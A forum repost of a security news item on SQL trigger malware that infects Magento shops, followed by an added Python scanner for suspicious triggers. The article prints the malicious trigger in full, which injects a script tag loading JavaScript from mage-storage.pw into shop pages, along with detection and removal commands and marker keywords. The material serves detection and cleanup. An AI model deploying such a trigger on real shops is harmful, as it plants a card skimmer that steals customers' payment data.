NickTheGreek

A new SQL malware Targets online shops running on Magento

Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware that is targeting websites running the Magento eCommerce platform. The novelty is that this is the first malware that hides its code in the website’s database and is completely written in SQL.

The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researcher Willem de Groot, who first analyzed the SQL malware discovered by Jeroen Boersma, explained that this is a significant evolution in the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

To detect the SQL malware, administrators have to inspect the database for suspicious SQL triggers, such as those containing admin, .js, script or < (HTML tags).

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once the malicious trigger has been discovered, it can be deleted with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks start with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

Below the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		value, 
		CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	) 
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		content, 
		CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	);
END;

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
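
The trigger inspection described in the post above, as an added example that is not part of the original post or of de Groot's tooling: it flags rows of SHOW TRIGGERS output whose statement contains the listed markers or writes to the content tables named in the trigger pattern. It assumes tab-separated output with a header row; the function name, the table check and the sample rows are constructed for illustration.

```python
import csv
import io

# Substrings the post says to look for in trigger definitions.
# "<" also matches SQL comparison operators, so a hit is a lead for review.
MARKERS = ("admin", ".js", "script", "<")
# Assumption added here: tables the trigger pattern in the post writes to.
CONTENT_TABLES = ("core_config_data", "cms_block")


def scan_triggers(tsv_text):
    """Return findings for rows of tab-separated SHOW TRIGGERS output."""
    findings = []
    reader = csv.DictReader(io.StringIO(tsv_text), delimiter="\t",
                            quoting=csv.QUOTE_NONE)
    for row in reader:
        body = (row.get("Statement") or "").lower()
        hits = [m for m in MARKERS if m in body]
        writes = [t for t in CONTENT_TABLES if t in body]
        if hits or writes:
            findings.append({
                "trigger": row.get("Trigger"),
                "table": row.get("Table"),
                "markers": hits,
                "writes_to": writes,
            })
    return findings


# Constructed sample: header plus two rows, reduced to four columns.
SAMPLE = (
    "Trigger\tEvent\tTable\tStatement\n"
    "trg_stock_audit\tUPDATE\tcataloginventory_stock_item\t"
    "BEGIN INSERT INTO stock_audit (item_id) VALUES (NEW.item_id); END\n"
    "after_insert_order\tINSERT\tsales_flat_order\t"
    "BEGIN UPDATE core_config_data SET value = CONCAT(value, "
    "' <script src=\"https://example.invalid/x.js\"></script>') "
    "WHERE path='design/head/includes'; END\n"
)

if __name__ == "__main__":
    for f in scan_triggers(SAMPLE):
        print(f"{f['trigger']} on {f['table']}: markers={f['markers']} "
              f"writes_to={f['writes_to']}")
```

A trigger that is flagged still needs manual review before it is dropped, since legitimate extensions can install triggers of their own.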
